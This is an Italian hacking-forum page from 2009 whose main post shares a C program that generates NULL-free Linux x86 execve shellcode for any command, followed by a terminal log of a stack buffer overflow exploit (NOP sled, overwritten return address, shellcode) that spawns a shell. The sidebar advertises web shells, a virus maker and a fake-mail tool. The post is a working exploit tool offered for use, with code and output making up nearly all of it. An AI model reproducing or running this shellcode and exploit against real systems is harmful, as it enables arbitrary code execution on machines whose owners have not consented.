KinG-InFeT.NeT  
  Login or Registrare
~  Home  ~  Downloads  ~  Your Account  ~  Forums  ~ Web-Links ~
Futuri aggiornamenti!!: Come avrete visto il sito � stato defacciato quindi data la poka sicurezza del CMS provveder� a cambiare interamente cms e a sistemare + la sicurezza
MENU - KinG-InFeT.NeT
· Home
· Acces Point Pwd-Default
· Archivio Exploit
· Ascii Tables
· Button Maker
· Cerca
· Codice Fiscale
· Contatta l'Admin
· Crea Avatar
· Dns IP Range
· Downloads
· Dragon Ball Series
· Flash Games
· Forums
· Genera Pass
· Geo-IP
· GuestBook
· HaCkEr-GaMe
· Home Page Flash Creator
· Image Hosting
· Invia una Fake-Mail
· l'HostName sapendo l'IP
· La migliore Distro Linux
· Lista Comandi UNIX
· Lista Utenti
· logo Creator
· MD5-Cracker Online
· MD5/SHA1 Generate
· Messaggi Privati
· MsN Account List
· My Personal Site
· Naviga Anonimo
· News dal Mondo dell'inf.
· Nick Name Maker
· No-Paste
· NuKe-TooLz
· NukeSentinel
· PaPeRs - TuToRiAl
· Proxy List
· Ricerca Satellitare
· Segnala Questo Sito
· Segnalami un Bug
· Smiley Generation
· Statistiche
· Top 10
· Total Search
· Userbar Creator
· WebLinks
· WordList
· XSS New Cheat List
 
Linkaci

Linkaci:

KinG-InFeT.NeT


 
Tool

Accedi al pannello di

Coding/Decoding - Tool


� By KinG-InFeT

 
Ricerca dominio
Registra il tuo Dominio Su Aruba :



 
Ultimi Download
Gli ultimi 10 Download
· 1: Shellr57
· 2: EVEREST Ultimate Edition v5.01.1700 + SERIALS
· 3: The Metasploit Project - Framework
· 4: Tanable Nessus Network Security Scanner
· 5: EtherApe
· 6: ntop - network top
· 7: Dsniff
· 8: Ettercap
· 9: TCPDUMP/LIBPCAP
· 10: Kismet


Top 10 Download
· 1: MsN-CrAsH [45]
· 2: Doork GooGle [44]
· 3: Acunetix Web Vulnerability Scanner 6 [40]
· 4: Virus Maker v 1.0 - NO LAMER! [38]
· 5: Matrix Effect [35]
· 6: Super Scan 4 [34]
· 7: Neo.Trace.Pro.v3.25 [32]
· 8: Cain & Abel [30]
· 9: FaKe-Mail [27]
· 10: ShellC99 [23]
 
Attack Hack Blocks
Questo è l'elenco degli indirizzi IP bloccati da NukeSentinel(tm).

· 79.46.31.224  - Script
· 79.10.29.101  - Script
· 79.54.99.183  - Script
· 72.51.46.230  - Admin
· 151.62.49.23  - Script
· 62.10.78.76  - Script
· 79.49.140.223  - Union
· 79.47.98.214  - Script
· 79.52.183.175  - Script
· 79.41.179.252  - Script
· 78.142.140.194  - Script
· 79.13.4.35  - Script
· 79.53.176.25  - Script
· 79.53.197.134  - Union
· 80.240.220.83  - CLike
· 79.36.13.104  - CLike
· 88.198.36.73  - Script
· 151.33.145.2  - Union
· 79.43.95.254  - Script
· 79.9.19.62  - Script

NukeSentinel™
 
KinG-InFeT.NeT: Forums

KinG-InFeT.NeT - Ufficial Forum :: Leggi il Topic - [C] Shellcode generator
 
 FAQFAQ   CercaCerca   Lista degli utentiLista degli utenti   Gruppi utentiGruppi utenti 
 ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

[C] Shellcode generator

 
Nuovo Topic   Rispondi    Indice del forum -> Programmazione C/C++
Precedente :: Successivo  
Autore Messaggio
admin
Founder
Founder


Registrato: Oct 03, 2008
Messaggi: 261

MessaggioInviato: Mer Apr 15, 2009 12:03 am    Oggetto: [C] Shellcode generator Rispondi citando

Ecco a voi finalmente IL generatore di shellcode DEFINITIVO per Linux x86. NULL-free, con uno shellcode di base il più corto possibile, testato e perfettamente funzionante su kernel 2.4 e 2.6. Aspettatevi presto di vederlo da qualche parte piuttosto 'importante'...Wink

Codice:
/*
 * BlackLight's shellcode generator for Linux x86
 * NULL-free version
 *
 * Usage: ./generator <cmd>
 * (C)2008 by BlackLight <blacklight[at]autistici.org>
 * Released under GPL v.3 licence
 *
 * Greetz to: evilsocket, for the idea he gave me ;)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char code[] =
        "\\x60"                        /*pusha*/
        "\\x31\\xc0"                   /*xor    %eax,%eax*/
        "\\x31\\xd2"                   /*xor    %edx,%edx*/
        "\\xb0\\x0b"                   /*mov    $0xb,%al*/
        "\\x52"                        /*push   %edx*/
        "\\x68\\x6e\\x2f\\x73\\x68"    /*push   $0x68732f6e*/
        "\\x68\\x2f\\x2f\\x62\\x69"    /*push   $0x69622f2f*/
        "\\x89\\xe3"                   /*mov    %esp,%ebx*/
        "\\x52"                        /*push   %edx*/
        "\\x68\\x2d\\x63\\x63\\x63"    /*push   $0x6363632d*/
        "\\x89\\xe1"                   /*mov    %esp,%ecx*/
        "\\x52"                        /*push   %edx*/
        "\\xeb\\x07"                   /*jmp   804839a <cmd>*/
        "\\x51"                        /*push   %ecx*/
        "\\x53"                        /*push   %ebx*/
        "\\x89\\xe1"                   /*mov    %esp,%ecx*/
        "\\xcd\\x80"                   /*int    $0x80*/
        "\\x61"                        /*popa*/
        "\\xe8\\xf4\\xff\\xff\\xff"    /*call  8048393 <l1>*/;

int main (int argc, char **argv)  {
        int i,len=0;
        char *shell,*cmd;

        if (!argv[1])
                exit(1);

        for (i=1; i<argc; i++)
                len += strlen(argv[i]);
        len += argc;

        cmd = (char*) malloc(len);

        for (i=1; i<argc; i++)  {
                strcat (cmd,argv[i]);
                strcat (cmd,"\x20");
        }

        cmd[strlen(cmd)-1]=0;
        shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
        memcpy (shell,code,sizeof(code));

        for (i=0; i<strlen(cmd); i++)
                sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
        printf ("%s\n",shell);
}




Codice:
blacklight@nightmare:~/prog/c/VULN$ ./vuln `perl -e 'print "\x90" x44; print "\x5b\xe7\xff\xff"; print "\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
[çÿÿ`1À1Ò°
          Rhn/shh//biãRh-cccáRëQSáÍaèôÿÿÿ/bin/sh
sh-3.1$



Ecco, questo si chiama shellcode generato automaticamente, pulito, breve, funzionante e perfettamente efficiente XD

http://www.milw0rm.com/shellcode/6274

by BlackLight
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Programmazione C/C++ Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum


CoPyRiGhT 2009 By KinG-InFeT
PhpBB Copiright 2009
Tutti I Diritti Riservati
Forums ©


Valid robots.txt
CoPyRiGhT © 2009/2010 By KinG-InFeT.NeT - Tutti i Diritti Riservati ®

Generazione pagina: 0.07 Secondi

Coder By KinG-InFeT